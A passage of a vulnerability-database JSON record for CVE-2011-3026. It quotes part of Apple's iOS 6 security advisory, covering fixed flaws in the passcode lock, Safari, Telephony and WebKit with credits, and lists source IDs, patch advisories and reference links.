This issue was addressed by disabling Voice Dialing on\nthe Emergency Dialer screen. \nCVE-ID\nCVE-2012-3738 : Ade Barkah of BlueWax Inc. \n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device may be able to\nbypass the screen lock\nDescription: Using the camera from the screen lock could in some\ncases interfere with automatic lock functionality, allowing a person\nwith physical access to the device to bypass the Passcode Lock\nscreen. This issue was addressed through improved lock state\nmanagement. \nCVE-ID\nCVE-2012-3739 : Sebastian Spanninger of the Austrian Federal\nComputing Centre (BRZ)\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device may be able to\nbypass the screen lock\nDescription: A state management issue existed in the handling of the\nscreen lock. This issue was addressed through improved lock state\nmanagement. \nCVE-ID\nCVE-2012-3740 : Ian Vitek of 2Secure AB\n\nRestrictions\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A user may be able to make purchases without entering Apple\nID credentials\nDescription: After disabling Restrictions, iOS may not ask for the\nuser\u0027s password during a transaction. This issue was addressed by\nadditional enforcement of purchase authorization. \nCVE-ID\nCVE-2012-3741 : Kevin Makens of Redwood High School\n\nSafari\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Websites may use characters with an appearance similar to\nthe lock icon in their titles\nDescription: Websites could use a Unicode character to create a lock\nicon in the page title. This icon was similar in appearance to the\nicon used to indicate a secure connection, and could have lead the\nuser to believe a secure connection had been established. This issue\nwas addressed by removing these characters from page titles. \nCVE-ID\nCVE-2012-3742 : Boku Kihara of Lepidum\n\nSafari\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Passwords may autocomplete even when the site specifies that\nautocomplete should be disabled\nDescription: Password input elements with the autocomplete attribute\nset to \"off\" were being autocompleted. This issue was addressed\nthrough improved handling of the autocomplete attribute. \nCVE-ID\nCVE-2012-0680 : Dan Poltawski of Moodle\n\nSystem Logs\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Sandboxed apps may obtain system log content\nDescription: Sandboxed apps had read access to /var/log directory,\nwhich may allow them to obtain sensitive information contained in\nsystem logs. This issue was addressed by denying sandboxed apps\naccess to the /var/log directory. \nCVE-ID\nCVE-2012-3743\n\nTelephony\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An SMS message may appear to have been sent by an arbitrary\nuser\nDescription: Messages displayed the return address of an SMS message\nas the sender. Return addresses may be spoofed. This issue was\naddressed by always displaying the originating address instead of the\nreturn address. \nCVE-ID\nCVE-2012-3744 : pod2g\n\nTelephony\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An SMS message may disrupt cellular connectivity\nDescription: An off-by-one buffer overflow existed in the handling\nof SMS user data headers. This issue was addressed through improved\nbounds checking. \nCVE-ID\nCVE-2012-3745 : pod2g\n\nUIKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An attacker that gains access to a device\u0027s filesystem may\nbe able to read files that were being displayed in a UIWebView\nDescription: Applications that use UIWebView may leave unencrypted\nfiles on the file system even when a passcode is enabled. This issue\nwas addressed through improved use of data protection. \nCVE-ID\nCVE-2012-3746 : Ben Smith of Box\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in WebKit. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2011-3016 : miaubiz\nCVE-2011-3021 : Arthur Gerkis\nCVE-2011-3027 : miaubiz\nCVE-2011-3032 : Arthur Gerkis\nCVE-2011-3034 : Arthur Gerkis\nCVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur\nGerkis\nCVE-2011-3036 : miaubiz\nCVE-2011-3037 : miaubiz\nCVE-2011-3038 : miaubiz\nCVE-2011-3039 : miaubiz\nCVE-2011-3040 : miaubiz\nCVE-2011-3041 : miaubiz\nCVE-2011-3042 : miaubiz\nCVE-2011-3043 : miaubiz\nCVE-2011-3044 : Arthur Gerkis\nCVE-2011-3050 : miaubiz\nCVE-2011-3053 : miaubiz\nCVE-2011-3059 : Arthur Gerkis\nCVE-2011-3060 : miaubiz\nCVE-2011-3064 : Atte Kettunen of OUSPG\nCVE-2011-3068 : miaubiz\nCVE-2011-3069 : miaubiz\nCVE-2011-3071 : pa_kt working with HP\u0027s Zero Day Initiative\nCVE-2011-3073 : Arthur Gerkis\nCVE-2011-3074 : Slawomir Blazek\nCVE-2011-3075 : miaubiz\nCVE-2011-3076 : miaubiz\nCVE-2011-3078 : Martin Barbella of the Google Chrome Security Team\nCVE-2011-3081 : miaubiz\nCVE-2011-3086 : Arthur Gerkis\nCVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz\nCVE-2011-3090 : Arthur Gerkis\nCVE-2011-3105 : miaubiz\nCVE-2011-3913 : Arthur Gerkis\nCVE-2011-3924 : Arthur Gerkis\nCVE-2011-3926 : Arthur Gerkis\nCVE-2011-3958 : miaubiz\nCVE-2011-3966 : Aki Helin of OUSPG\nCVE-2011-3968 : Arthur Gerkis\nCVE-2011-3969 : Arthur Gerkis\nCVE-2011-3971 : Arthur Gerkis\nCVE-2012-0682 : Apple Product Security\nCVE-2012-0683 : Dave Mandelin of Mozilla\nCVE-2012-1520 : Martin Barbella of the Google Chrome Security Team\nusing AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com\nworking with iDefense VCP\nCVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A. \nVazquez of spa-s3c.blogspot.com working with iDefense VCP\nCVE-2012-2818 : miaubiz\nCVE-2012-3589 : Dave Mandelin of Mozilla\nCVE-2012-3590 : Apple Product Security\nCVE-2012-3591 : Apple Product Security\nCVE-2012-3592 : Apple Product Security\nCVE-2012-3593 : Apple Product Security\nCVE-2012-3594 : miaubiz\nCVE-2012-3595 : Martin Barbella of Google Chrome Security\nCVE-2012-3596 : Skylined of the Google Chrome Security Team\nCVE-2012-3597 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3598 : Apple Product Security\nCVE-2012-3599 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3600 : David Levin of the Chromium development community\nCVE-2012-3601 : Martin Barbella of the Google Chrome Security Team\nusing AddressSanitizer\nCVE-2012-3602 : miaubiz\nCVE-2012-3603 : Apple Product Security\nCVE-2012-3604 : Skylined of the Google Chrome Security Team\nCVE-2012-3605 : Cris Neckar of the Google Chrome Security team\nCVE-2012-3608 : Skylined of the Google Chrome Security Team\nCVE-2012-3609 : Skylined of the Google Chrome Security Team\nCVE-2012-3610 : Skylined of the Google Chrome Security Team\nCVE-2012-3611 : Apple Product Security\nCVE-2012-3612 : Skylined of the Google Chrome Security Team\nCVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3614 : Yong Li of Research In Motion, Inc. \nCVE-2012-3615 : Stephen Chenney of the Chromium development community\nCVE-2012-3617 : Apple Product Security\nCVE-2012-3618 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3620 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3624 : Skylined of the Google Chrome Security Team\nCVE-2012-3625 : Skylined of Google Chrome Security Team\nCVE-2012-3626 : Apple Product Security\nCVE-2012-3627 : Skylined and Abhishek Arya (Inferno) of Google Chrome\nSecurity team\nCVE-2012-3628 : Apple Product Security\nCVE-2012-3629 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3630 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3631 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3633 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3634 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3635 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3636 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3637 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3638 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3639 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3640 : miaubiz\nCVE-2012-3641 : Slawomir Blazek\nCVE-2012-3642 : miaubiz\nCVE-2012-3644 : miaubiz\nCVE-2012-3645 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3646 : Julien Chaffraix of the Chromium development\ncommunity, Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3647 : Skylined of the Google Chrome Security Team\nCVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3651 : Abhishek Arya (Inferno) and Martin Barbella of the\nGoogle Chrome Security Team\nCVE-2012-3652 : Martin Barbella of Google Chrome Security Team\nCVE-2012-3653 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3655 : Skylined of the Google Chrome Security Team\nCVE-2012-3656 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3658 : Apple\nCVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya\n(Inferno) of the Google Chrome Security Team\nCVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3661 : Apple Product Security\nCVE-2012-3663 : Skylined of Google Chrome Security Team\nCVE-2012-3664 : Thomas Sepez of the Chromium development community\nCVE-2012-3665 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3666 : Apple\nCVE-2012-3667 : Trevor Squires of propaneapp.com\nCVE-2012-3668 : Apple Product Security\nCVE-2012-3669 : Apple Product Security\nCVE-2012-3670 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam, Arthur Gerkis\nCVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome\nSecurity Team\nCVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3674 : Skylined of Google Chrome Security Team\nCVE-2012-3676 : Julien Chaffraix of the Chromium development\ncommunity\nCVE-2012-3677 : Apple\nCVE-2012-3678 : Apple Product Security\nCVE-2012-3679 : Chris Leary of Mozilla\nCVE-2012-3680 : Skylined of Google Chrome Security Team\nCVE-2012-3681 : Apple\nCVE-2012-3682 : Adam Barth of the Google Chrome Security Team\nCVE-2012-3683 : wushi of team509 working with iDefense VCP\nCVE-2012-3684 : kuzzcc\nCVE-2012-3686 : Robin Cao of Torch Mobile (Beijing)\nCVE-2012-3703 : Apple Product Security\nCVE-2012-3704 : Skylined of the Google Chrome Security Team\nCVE-2012-3706 : Apple Product Security\nCVE-2012-3708 : Apple\nCVE-2012-3710 : James Robinson of Google\nCVE-2012-3747 : David Bloom of Cue\n\nWebKit\nAvailable for: iPhone 3GS, iPhone 4, iPhone 4S,\niPod touch (3rd generation) and later, iPad, iPad 2\nImpact: Visiting a maliciously crafted website may lead to a cross-\nsite disclosure of information\nDescription: A cross-origin issue existed in the handling of CSS\nproperty values. This issue was addressed through improved origin\ntracking. \nCVE-ID\nCVE-2012-3691 : Apple\n\nWebKit\nAvailable for: iPhone 3GS, iPhone 4, iPhone 4S,\niPod touch (3rd generation) and later, iPad, iPad 2\nImpact: A malicious website may be able to replace the contents of\nan iframe on another site\nDescription: A cross-origin issue existed in the handling of iframes\nin popup windows. This issue was addressed through improved origin\ntracking. \nCVE-ID\nCVE-2011-3067 : Sergey Glazunov\n\nWebKit\nAvailable for: iPhone 3GS, iPhone 4, iPhone 4S,\niPod touch (3rd generation) and later, iPad, iPad 2\nImpact: Visiting a maliciously crafted website may lead to a cross-\nsite disclosure of information\nDescription: A cross-origin issue existed in the handling of iframes\nand fragment identifiers. This issue was addressed through improved\norigin tracking. \nCVE-ID\nCVE-2012-2815 : Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt,\nand Dan Boneh of the Stanford University Security Laboratory\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Look-alike characters in a URL could be used to masquerade a\nwebsite\nDescription: The International Domain Name (IDN) support and Unicode\nfonts embedded in Safari could have been used to create a URL which\ncontains look-alike characters. These could have been used in a\nmalicious website to direct the user to a spoofed site that visually\nappears to be a legitimate domain. This issue was addressed by\nsupplementing WebKit\u0027s list of known look-alike characters. Look-\nalike characters are rendered in Punycode in the address bar. \nCVE-ID\nCVE-2012-3693 : Matt Cooley of Symantec\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription: A canonicalization issue existed in the handling of\nURLs. This may have led to cross-site scripting on sites which use\nthe location.href property. This issue was addressed through improved\ncanonicalization of URLs. \nCVE-ID\nCVE-2012-3695 : Masato Kinugawa\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to HTTP\nrequest splitting\nDescription: An HTTP header injection issue existed in the handling\nof WebSockets. This issue was addressed through improved WebSockets\nURI sanitization. \nCVE-ID\nCVE-2012-3696 : David Belcher of the BlackBerry Security Incident\nResponse Team\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A maliciously crafted website may be able to spoof the value\nin the URL bar\nDescription: A state management issue existed in the handling of\nsession history. Navigations to a fragment on the current page may\ncause Safari to display incorrect information in the URL bar. This\nissue was addressed through improved session state tracking. \nCVE-ID\nCVE-2011-2845 : Jordi Chancel\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to the\ndisclosure of the disclosure of memory contents\nDescription: An uninitialized memory access issue existed in the\nhandling of SVG images. This issue was addressed through improved\nmemory initialization. \nCVE-ID\nCVE-2012-3650 : Apple\n\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update will be \"6.0\". \n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJQWeYHAAoJEPefwLHPlZEwFlwP/1Ib/2m8K7orlPb3zmsKTyjo\n3T0rFqu1LbXNzwLRhan7E7KiJoQ7U6yVO4045o/19AYZM+zGVNnHsCkUc3+Vcpa5\nTZIM9Rik2iXKMxzttFfc5tvhE1u18PstsDLU/jvyW+s3XxMVL54wnSmW1R+P0de0\n8+Q++IANogUj+scJzQkTaFDNDN5v1p0BT0+cifCcqktXB4H/PoaQ7drIWiDGYB/9\nn4IL5AjM0BJBzWkldfjPimZ0BseSA0BxdeVCopmAgdnigyB60G4cWGzkU7E35VnP\ndWgdU9rnIIvGGe/vP912f7AoPtWs1b8n6DYCJgGRXvaRfPoHFUlXaRoVB6vJlMVs\nJXyMrw/RSDfYEgJdNbFOSxyJXHUkTkt4+aNW4KcoMR6raI/W5zKDyMEICw1wpkwP\nid6Dz4e6ncf+cfvAFqXpk02OC7iJqn71IJN2MvU/hC7797l++PINIoOHwJZolt+T\nxL3wV8p3Lk8K6lZx3Q9Tu6Dd7GYkxtjLCgV1NgdHOwPKDUOJ47oG6RjZAd6hpicp\nRqYXbk5bJpd3nZv+X6FrCZqGfeuwREWW7FJ0dI+/8ohlnisTz16f48W9FtuN3HIj\nbmxFJ46P4LGxrizwDSdBngxf3Utkh+7hGLuMH51/jR8+tCqDIEgpKBA+2F+IOmyP\nXtT4lS60xKz63YSg79dd\n=LvMt\n-----END PGP SIGNATURE-----\n. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-3026"
},
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-50971",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50971"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-3026",
"trust": 2.3
},
{
"db": "SECUNIA",
"id": "49660",
"trust": 1.2
},
{
"db": "SECUNIA",
"id": "48110",
"trust": 1.2
},
{
"db": "SECUNIA",
"id": "48016",
"trust": 1.2
},
{
"db": "CERT/CC",
"id": "VU#849841",
"trust": 1.0
},
{
"db": "BID",
"id": "56610",
"trust": 0.9
},
{
"db": "SECTRACK",
"id": "1027799",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "51362",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "87619",
"trust": 0.8
},
{
"db": "BID",
"id": "52049",
"trust": 0.4
},
{
"db": "CERT/CC",
"id": "VU#523889",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "109836",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109898",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109835",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109897",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "110096",
"trust": 0.2
},
{
"db": "SECUNIA",
"id": "51365",
"trust": 0.2
},
{
"db": "CNNVD",
"id": "CNNVD-201211-461",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-59558",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "116792",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109833",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110263",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109838",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109900",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109791",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109967",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-201202-339",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-50971",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2011-3026",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "118291",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114070",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "116791",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"id": "VAR-201202-0137",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
}
],
"trust": 0.02
},
"last_update_date": "2026-03-09T20:07:10.016000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Red Hat: Critical: thunderbird security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120140 - Security Advisory"
},
{
"title": "Red Hat: Critical: seamonkey security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120141 - Security Advisory"
},
{
"title": "Red Hat: Critical: xulrunner security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120143 - Security Advisory"
},
{
"title": "Red Hat: Critical: firefox security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120142 - Security Advisory"
},
{
"title": "Red Hat: Important: libpng security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120317 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2011-3026",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e819467ec1d6eb370af249e8c57643ae"
},
{
"title": "Ubuntu Security Notice: xulrunner-1.9.2 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-4"
},
{
"title": "Ubuntu Security Notice: thunderbird vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-3"
},
{
"title": "Ubuntu Security Notice: firefox vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-2"
},
{
"title": "Amazon Linux AMI: ALAS-2012-049",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2012-049"
},
{
"title": "Mozilla: Mozilla Foundation Security Advisory 2012-11",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2012-11"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-1"
},
{
"title": "Mozilla: libpng integer overflow",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=5af0471059f077bf7e3d2b0ef3aef299"
},
{
"title": "Ubuntu Security Notice: thunderbird vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1369-1"
},
{
"title": "cve-2011-3026-firefox",
"trust": 0.1,
"url": "https://github.com/argp/cve-2011-3026-firefox "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/CVEDB/PoC-List "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2011-3026"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-190",
"trust": 1.1
},
{
"problemtype": "CWE-189",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.5,
"url": "http://googlechromereleases.blogspot.com/2012/02/chrome-stable-update.html"
},
{
"trust": 1.3,
"url": "http://security.gentoo.org/glsa/glsa-201206-15.xml"
},
{
"trust": 1.2,
"url": "http://lists.apple.com/archives/security-announce/2012/sep/msg00003.html"
},
{
"trust": 1.2,
"url": "http://lists.apple.com/archives/security-announce/2012/sep/msg00004.html"
},
{
"trust": 1.2,
"url": "http://code.google.com/p/chromium/issues/detail?id=112822"
},
{
"trust": 1.2,
"url": "http://support.apple.com/kb/ht5501"
},
{
"trust": 1.2,
"url": "http://support.apple.com/kb/ht5503"
},
{
"trust": 1.2,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a15032"
},
{
"trust": 1.2,
"url": "http://secunia.com/advisories/48016"
},
{
"trust": 1.2,
"url": "http://secunia.com/advisories/48110"
},
{
"trust": 1.2,
"url": "http://secunia.com/advisories/49660"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00023.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00020.html"
},
{
"trust": 0.9,
"url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=\u0026suid=20121120_00"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/bid/56610"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/products/idol-modules-connectors/index.en.html"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/technology/idol-functionality-information-connectivity/index.en.html"
},
{
"trust": 0.8,
"url": "https://customers.autonomy.com"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/2458544"
},
{
"trust": 0.8,
"url": "http://www.youtube.com/watch?v=28_lus_g0u4"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/id/1027799"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/show/osvdb/87619"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/51362 "
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/news/releases/2004/0803a.en.html"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/news/releases/2008/0701.en.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3026"
},
{
"trust": 0.4,
"url": "http://www.kb.cert.org/vuls/id/523889"
},
{
"trust": 0.3,
"url": "http://support.apple.com/kb/ht5504"
},
{
"trust": 0.3,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 0.3,
"url": "http://blog.mozilla.com/security/2012/02/17/mozilla-releases-to-address-cve-2011-3026/"
},
{
"trust": 0.3,
"url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_libpng2"
},
{
"trust": 0.3,
"url": "http://www.srware.net/forum/viewtopic.php?f=18\u0026t=3521"
},
{
"trust": 0.3,
"url": "http://www.palemoon.org/releasenotes.shtml"
},
{
"trust": 0.3,
"url": "http://www.palemoon.org/releasenotes-ng.shtml"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100157180"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100157471"
},
{
"trust": 0.3,
"url": "https://downloads.avaya.com/css/p8/documents/100160998"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21620982"
},
{
"trust": 0.3,
